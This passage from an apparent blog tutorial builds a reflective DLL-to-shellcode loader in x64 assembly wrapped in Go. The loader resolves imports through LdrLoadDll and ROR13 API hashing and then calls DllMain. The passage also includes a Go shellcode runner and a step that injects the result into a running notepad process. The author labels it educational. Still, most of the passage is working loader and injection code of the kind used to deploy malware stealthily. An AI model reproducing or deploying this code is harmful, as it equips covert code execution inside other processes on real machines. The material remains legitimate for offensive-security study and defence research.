"	add edx, eax;",      // Part of hash algorithm
"	jmp iteration2;",    // Next byte

"getProcAddress:",
"	mov r8,r15;",            // overwritten by mov r8d, edx below
"	mov r9,qword ptr[rsp];", // move dll base address to r9 for parse_module
"	mov r8d, edx;",          // Hash
"	call parse_module;",     // Search and obtain address of the imported function

"	mov qword ptr[r12],rax;", // write import
"	add r12,0x8;",           // point to next proc address
"	jmp inner_import_loop;", //loop

"exit_inner_import_loop:",
"	pop rax;",      // get rid of dll address
"	pop r12;",      // retrieve Import Descriptor address from stack
"	add r12,0x14;", // Point to the next import
"	jmp imports_loop;",

"exit_imports_loop:",

This is the longest part of the code, so let's break it into smaller sections.

Import Descriptor Address

"imports:",
"	mov r13,qword ptr [rbp-0x30];", // Optional header -> r13
"	add r13, 0x78;",                // offset of the import directory entry
"	mov r12d, dword ptr[r13];",      // imports.VirtualAddress -> r12
"	add r12,qword ptr [rbp-0x38];", // Import Descriptor address

Here we need to capture the address of the Import Descriptor.

  • Line 2: Move Optional Header address into r13

  • Line 3: Import Descriptor RVA is located at offset 0x78 in the OptionalHeader

  • Line 4: Move RVA value to r12

  • Line 5: Add the base dll value to the RVA in r12

Dll loop (outer loop)

DLL Name Address

"imports_loop:",

//r12 -> import descriptor address
"	mov r13, r12;",                  // r13 points to the beginning of the import descriptor
"	add r13, 0x0c;",                 // offset 0xc points to the name RVA
"	mov r13d, dword ptr[r13];",      // dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 // check if RVA is 0
"	je exit_imports_loop;",          // exit loop if RVA == 0
"	add r13, qword ptr [rbp-0x38];", // dll name address
"	mov rsi,r13;",                   // used by lodsb

  • Line 5: Name RVA is located at offset 0x0c from the beginning of the import descriptor

  • Line 6: Move RVA value into r13

  • Line 7: Compares RVA value to 0

  • Line 8: If the value is zero it breaks off the loop

  • Line 9: Calculates the absolute address by adding the DLL base address to the RVA

  • Line 10: Move absolute address to rsi
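
To make the outer loop easier to follow, here is a rough Go equivalent that walks the descriptor table of an image that is already mapped in memory. It is a sketch under assumptions: importedDLLNames and sampleImage are hypothetical helpers, and the "image" is a synthetic buffer rather than a real DLL. The offsets 0x0c (name RVA) and 0x14 (descriptor stride) are the ones used by the assembly.

```go
package main

import (
	"encoding/binary"
	"fmt"
)

const (
	descriptorSize = 0x14 // stride between import descriptors (add r12,0x14)
	nameRVAOffset  = 0x0c // offset of the Name RVA inside a descriptor
)

// importedDLLNames walks the descriptor table of a mapped image (so RVAs
// are plain offsets into the slice). It stops at the first descriptor
// whose Name RVA is 0, like the je exit_imports_loop above.
func importedDLLNames(image []byte, tableRVA uint32) []string {
	var names []string
	for off := int(tableRVA); off+descriptorSize <= len(image); off += descriptorSize {
		nameRVA := int(binary.LittleEndian.Uint32(image[off+nameRVAOffset:]))
		if nameRVA == 0 || nameRVA >= len(image) {
			break
		}
		end := nameRVA
		for end < len(image) && image[end] != 0 {
			end++ // scan to the NUL terminator of the ASCII name
		}
		names = append(names, string(image[nameRVA:end]))
	}
	return names
}

// sampleImage builds a made-up mapped image with two descriptors at
// RVA 0x40, followed by an all-zero terminating descriptor.
func sampleImage() []byte {
	image := make([]byte, 0x200)
	binary.LittleEndian.PutUint32(image[0x40+nameRVAOffset:], 0x100)
	binary.LittleEndian.PutUint32(image[0x40+descriptorSize+nameRVAOffset:], 0x120)
	copy(image[0x100:], "KERNEL32.dll")
	copy(image[0x120:], "USER32.dll")
	return image
}

func main() {
	for _, name := range importedDLLNames(sampleImage(), 0x40) {
		fmt.Println(name)
	}
}
```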

LdrLoadDll

It would be easier to just use LoadLibrary, since all that API needs is a pointer to the name of the dll, which is already stored in rsi.

Instead we use LdrLoadDll, which lives in ntdll and takes the name as a UNICODE_STRING structure. A few years back this would even have been considered stealthier, but I am not sure that's the case nowadays.

Let's take a look at the function definition.

LdrLoadDll(
  IN PWCHAR               PathToFile OPTIONAL,
  IN PULONG                Flags OPTIONAL,
  IN PUNICODE_STRING      ModuleFileName,
  OUT PHANDLE             ModuleHandle );

In order to understand the arguments passed to this (undocumented) function, I ran LoadLibrary and set a breakpoint on LdrLoadDll:

  • PathToFile was set to 1

  • Flags was a pointer to a value of 0

  • ModuleFileName was a pointer to the UNICODE_STRING struct holding the name of the dll

  • ModuleHandle was a pointer to the location where the dll's base address is returned

UNICODE_STRING

The arguments that LdrLoadDll takes are straightforward, except for the UNICODE_STRING struct. Let's have a quick look at the struct definition:

typedef struct _UNICODE_STRING {
  USHORT Length;
  USHORT MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

First we need to transform the dll name from a null-terminated byte array to a wide character array. This essentially means that every character becomes a word (2 bytes), where the first byte is the one we already had and the second is a 0 byte. The null terminator will be two null bytes.

Let's take kernel32.dll as an example. In memory we currently have

4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00

After it is transformed to a wide string, this is how it will look in memory:

4B 00 45 00 52 00 4E 00 45 00 4C 00 33 00 32 00 2E 00 64 00 6C 00 6C 00 00 00

We then have to calculate the length of the wide dll string.

Length will be 24 (0x18), which is the size in bytes of the wide string without the null termination bytes (12 characters of 2 bytes each).

MaximumLength will be 26 (0x1a), which is the size of the wide string including the termination bytes.
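
The conversion and the byte counts can be checked with a few lines of Go. This is a minimal sketch that assumes a plain ASCII name, as the loader does; toWide and unicodeLengths are hypothetical helper names used only for this illustration.

```go
package main

import "fmt"

// toWide widens an ASCII name the same way the loader does: each byte is
// followed by a zero byte, and two zero bytes terminate the string.
func toWide(name string) []byte {
	wide := make([]byte, 0, 2*len(name)+2)
	for i := 0; i < len(name); i++ {
		wide = append(wide, name[i], 0x00)
	}
	return append(wide, 0x00, 0x00)
}

// unicodeLengths returns the Length and MaximumLength fields in bytes:
// MaximumLength counts the terminator, Length does not.
func unicodeLengths(name string) (length, maximumLength uint16) {
	maximumLength = uint16(len(toWide(name)))
	return maximumLength - 2, maximumLength
}

func main() {
	name := "KERNEL32.dll" // 12 ASCII characters
	length, maximumLength := unicodeLengths(name)
	fmt.Printf("% X\n", toWide(name))
	fmt.Printf("Length=0x%x MaximumLength=0x%x\n", length, maximumLength)
}
```

For the 12-character name used here the sketch reports 0x18 for Length and 0x1a for MaximumLength, which is what the byte dump above adds up to.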

ASM code

Let's dive into the code that constructs the UNICODE_STRING:

"       xor rax,rax;", // used by lodsb
"       xor r11,r11;", // size
"       push rax;",    // Creating a space of 0s for the Unicode String Buffer
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",
"       push rax;",

"loop_through_DLL:",            // Iterate over each byte
" 	lodsb;",                     // Load the next byte at [rsi] into al
" 	test al, al;",               // If reaching the end of the string
" 	jz end_loop_through_DLL;",   // leave the loop
"	mov byte ptr [rsp+r11], al;", // In the buffer we write the dll name bytes in every second byte. (0s in between K.E.R.N.E.L.3.2.D.L.L..)
"	add r11w,0x2;",
" 	jmp loop_through_DLL;", // Next byte


"end_loop_through_DLL:", // The whole name has been copied
"	add r11w, 0x2;", // MaximumLength
"	mov ax,r11w;",
"	shl rax,16;",
"	sub r11w, 0x2;",    // Length
"	or rax,r11;",       // first qword is the length and max length
"       lea rsi, [rsp];", // pointer to the buffer
"	push rsi;",         // push pointer to the stack
"	push rax;",         // push lengths to the stack to form the UNICODE_STRING

  • Lines 1-2: Zero rax and r11 for use by the loop

  • Lines 3-13: Create a space of zeros on the stack

  • Line 16: Copy the next byte at address rsi to al

  • Line 17: Check if it's the null terminator

  • Line 18: Break the loop by jumping to line 24 (end_loop_through_DLL)

  • Line 19: Write the byte to the stack

  • Line 20: Point to the next location on the stack, leaving a 0 byte in between

  • Line 21: Iterate

When we reach this point, our whole string has been turned into a wide string in memory.

  • Line 25: Calculate the MaximumLength by adding the 2 null terminating bytes to the size

At this point we start constructing the struct on the stack.

  • Line 26: Move the MaximumLength value from r11w into ax

  • Line 27: Shift rax left by 16 bits

  • Line 28: Subtract 2 from r11w to get the Length

  • Line 29: Merge the MaximumLength and Length in rax by using or

  • Line 30: Get a pointer to the wide string on the stack

  • Line 31: Push the pointer to the wide string onto the stack

  • Line 32: Push the lengths onto the stack

We now have the struct on the stack.

"       lea rsi, [rsp];", // Pointer to the UNICODE_STRING
"	push rsi;",         // unicode string of the dll
"       mov r9,qword ptr [rbp-0x10];", // move ntdll base address to r9 for parse_module
"       mov r8d, 0xb0988fe4;",         // LdrLoadDll Hash

"       call parse_module;", // Search and obtain address of LdrLoadDll
"	xor rcx,rcx;",
"	inc rcx;",    // first arg 1
"	pop r8;",     // third arg Pointer to the unicode string on the stack
" 	xor r9,r9;", // 0 -> r9
"	push r9;",
"       lea rdx, [rsp];", // second arg null pointer
"       lea r9, [rsp];",  // fourth argument pointer the dll base address
"	mov rsi, r9;",

"	sub rsp,0x20;",         // shadow space
"	call rax;",             // call LdrLoadDll
"	add rsp,0x20;",         // restore stack
"	push r12;",             // import descriptor address -> stack
"	push qword ptr [rsi];", // address of dll to stack
"	mov r12d, dword ptr[r12+0x10];",
"	add r12,qword ptr [rbp-0x38];",

We now have all the values we need to call LdrLoadDll.

  • Line 1: Load a pointer to the UNICODE_STRING into rsi

  • Line 2: Store rsi to the stack

  • Line 3: Move the base address of ntdll in r9

  • Line 4: Move the hash of LdrLoadDll to r8

  • Line 6: Call parse_module to get the function address rax

  • Lines 7-8: Set the first argument by setting rcx to 1

  • Line 9: Set third argument by popping the address of the structure to r8

  • Lines 10-12: Set rdx (second argument) to a pointer that points to 0

  • Line 13: Set r9 (fourth argument) to a pointer that points to 0. The dll base address will be stored here

  • Line 14: Move r9 to rsi to use after the function call

  • Lines 16 & 18: Add and remove shadow space before and after the call

  • Line 17: Call LdrLoadDll

  • Line 19: Store import descriptor address to stack before the inner loop

  • Line 20: Store the base address of the loaded dll on the stack

  • Line 21: First thunk RVA

  • Line 22: Absolute address of the first thunk

Function Imports (Inner loop)

We have now loaded the DLL in memory using LdrLoadDll. The next step is to import the functions from that dll using parse_module.

"inner_import_loop:",
"	mov r13d, dword ptr[r12];",      //dereference to get RVA value to r13
"	cmp r13d, 0x0;",                 //check if RVA is 0
"	je exit_inner_import_loop;",     // exit loop if RVA ==0
"	add r13, qword ptr [rbp-0x38];", //
"	add r13,0x2;",
"	mov rsi,r13;",

//"function_hashing:", // Hash function name function
" 	xor rax, rax;",
" 	xor rdx, rdx;",
" 	cld;", // Clear DF flag

"iteration2:",          // Iterate over each byte
" 	lodsb;",             // Load the next byte at [rsi] into al
" 	test al, al;",       // If reaching the end of the string
" 	jz getProcAddress;", // hash is complete, go resolve it
" 	ror edx, 0x0d;",     // Part of hash algorithm
" 	add edx, eax;",      // Part of hash algorithm
" 	jmp iteration2;",    // Next byte

"getProcAddress:",
"       mov r9,qword ptr[rsp];", // move dll base address to r9 for parse_module
"       mov r8d, edx;",          // Hash
"       call parse_module;",     // Search and obtain address of the imported function

"	mov qword ptr[r12],rax;", // write import
"	add r12,0x8;",           // point to next proc address
"	jmp inner_import_loop;", // loop

  • Line 2: Get the RVA of the function name to r13

  • Line 3: Checks if RVA equals to 0

  • Line 4: Break off the loop

  • Line 5: Get Absolute address of the function name

  • Line 6: Add 0x2 to the absolute address in r13 to skip the 2-byte Hint field that precedes the function name

  • Lines 9-20: Turn the function name into a function hash as described here

  • Line 23: Move dll base address to r9

  • Line 24: Move hash from edx to r8

  • Line 25: Call parse module

  • Line 27: Overwrite the thunk entry (in the first thunk array) with the function address

  • Line 28: Point to the next function

  • Line 29: Iterate.
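
The hashing loop (iteration2) translates almost line for line into Go. The sketch below only models that loop: ror13Hash is a hypothetical name, and whether parse_module hashes export names in exactly the same way is taken from the description in the article, not verified here.

```go
package main

import (
	"fmt"
	"math/bits"
)

// ror13Hash mirrors the iteration2 loop: for every byte before the NUL
// terminator, rotate the running hash right by 13 bits (ror edx,0x0d)
// and add the byte (add edx,eax). The terminator itself is not hashed,
// because the test/jz pair leaves the loop before the rotate.
func ror13Hash(name string) uint32 {
	var h uint32
	for i := 0; i < len(name); i++ {
		h = bits.RotateLeft32(h, -13) + uint32(name[i])
	}
	return h
}

func main() {
	// Example import names; any function name from the import table works.
	for _, name := range []string{"MessageBoxA", "LdrLoadDll"} {
		fmt.Printf("%-12s -> 0x%08x\n", name, ror13Hash(name))
	}
}
```

A negative rotation count in bits.RotateLeft32 rotates to the right, which is why -13 is used instead of writing the shifts by hand.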

With all imports resolved, we are now ready to execute our code.

Call DllMain

Our code is now ready to be executed.

"	mov r13,qword ptr [rbp-0x30];", // optional header into r13
"	add r13,0x10;",                 // entry point address
"	mov r13d, dword ptr [r13];",
"	add r13,  qword ptr [rbp-0x38];", // absolute entry point address
"	mov rcx, qword ptr [rbp-0x38];",  // dllbase first arg
"	mov rdx, 0x1;",                   //	DLL_PROCESS_ATTACH = 0x1 second arg
"	mov r8, 0x0;",                    // 3rd arg 0
"	xor r9,r9;",

"	sub rsp,0x20;", // shadow space
"	call r13;",
"	add rsp,0x20;", // restore stack

All we have to do now is call the entry point (DllMain). The address of the entry point can be found in the optional header at offset 0x10.

  • Line 1: Move optional header to r13

  • Line 2: Add the 0x10 offset to r13

  • Line 3: Move the RVA value to r13

  • Line 4: Add dll base address to get the absolute address of the entry point

Let's have a quick look at the Entry point (DllMain) definition:

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,  // handle to DLL module
    DWORD fdwReason,     // reason for calling function
    LPVOID lpvReserved )  // reserved

hinstDLL is the base dll address

fdwReason we will set to 0x1 for DLL_PROCESS_ATTACH

lpvReserved will be set to 0

  • Line 5: the base address is moved to rcx ( 1st argument)

  • Line 6: rdx set to 0x1 (2nd argument)

  • Line 7: r8 set to 0 (3rd argument)

  • Lines 10&12: Add and remove shadow space before and after the call

  • Line 11: Call Entry point

At this point, if everything went well, we will see a popup window from our DLL.

Great :)

Shellcode epilogue

"Epilogue:",
"	mov rsp,rbp;",
"	pop rbp;",
"	pop rbx;",
"	pop rdi;",
"	pop rsi;",
"	pop r15;",
"	pop r14;",
"	pop r13;",
"	pop r12;",
"	ret;",

In the epilogue we restore rsp and all non-volatile registers. This is especially important if we are planning to return execution to the calling program.

Testing our shellcode

Inline Execution

In order to check whether our shellcode returns without crashing our main program, we have to modify the shellcode runner to run the code inline instead of creating a new thread.

In our shellcode runner we can replace the CreateThread call with syscall.SyscallN.

func ShellcodeRunner(sc []byte) error {
	//msfvenom  -f hex -p windows/x64/exec cmd=calc
	fmt.Println("----> Run shellcode <----")
	fmt.Println("[+] Allocating memory for shellcode")
	addr, err := windows.VirtualAlloc(uintptr(0), uintptr(len(sc)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_EXECUTE_READWRITE)
	if err != nil {
		return fmt.Errorf("[FATAL] VirtualAlloc Failed: %v\n", err)
	}
	fmt.Printf("[+] Allocated Memory Address: 0x%x\n", addr)

	modntdll := syscall.NewLazyDLL("Ntdll.dll")
	procrtlMoveMemory := modntdll.NewProc("RtlMoveMemory")

	procrtlMoveMemory.Call(addr, uintptr(unsafe.Pointer(&sc[0])), uintptr(len(sc)))
	fmt.Println("[+] Wrote shellcode bytes to destination address")

	fmt.Println("[+] Changing Permissions to RX")
	var oldProtect uint32
	err = windows.VirtualProtect(addr, uintptr(len(sc)), windows.PAGE_EXECUTE_READ, &oldProtect)

	if err != nil {
		return fmt.Errorf("[FATAL] VirtualProtect Failed: %v", err)
	}

	/*modKernel32 := syscall.NewLazyDLL("kernel32.dll")
	procCreateThread := modKernel32.NewProc("CreateThread")
	tHandle, _, lastErr := procCreateThread.Call(
		uintptr(0),
		uintptr(0),
		addr,
		uintptr(0),
		uintptr(0),
		uintptr(0))

	if tHandle == 0 {
		return fmt.Errorf("Unable to Create Thread: %v\n", lastErr)
	}

	fmt.Printf("[+] Handle of newly created thread:  %x \n", tHandle)
	windows.WaitForSingleObject(windows.Handle(tHandle), windows.INFINITE)*/
	syscall.SyscallN(addr)
	return nil
}

This is what our new shellcode runner function looks like.

Also, in our main function we add another print statement after calling the shellcode runner function:

	fmt.Println("[SUCCESS] Done")

If we successfully restore all the registers and the stack pointers, we should see the above message printed in the console after we press "OK" on the messagebox.

Our shellcode returns cleanly to the main function.

Shellcode injection

Let's test our code when it's injected into a remote process. We switch our function call from ShellcodeRunner to shecllodeIjnection:

	err = shecllodeIjnection(22124, srdi) //Run the generated shellcode
	if err != nil {
		log.Fatalln(err)
	}

We then give it the pid of a running notepad process.

Future Work / Improvements

The code is meant to be used for educational purposes. It's not ready to be used in production or as part of a real red team engagement. Here is a list of a few future improvements:

  • Remove all null bytes from the shellcode

  • Ability to generate shellcode that calls any exported function and passes arguments to it

  • Add indirect syscall functionality

  • Remove unnecessary winapi calls such as WriteProcessMemory

  • Clean memory after execution

  • Avoid the use of rwx regions

Complete Code:

https://github.com/scriptchildie/GoDll2Shellcode
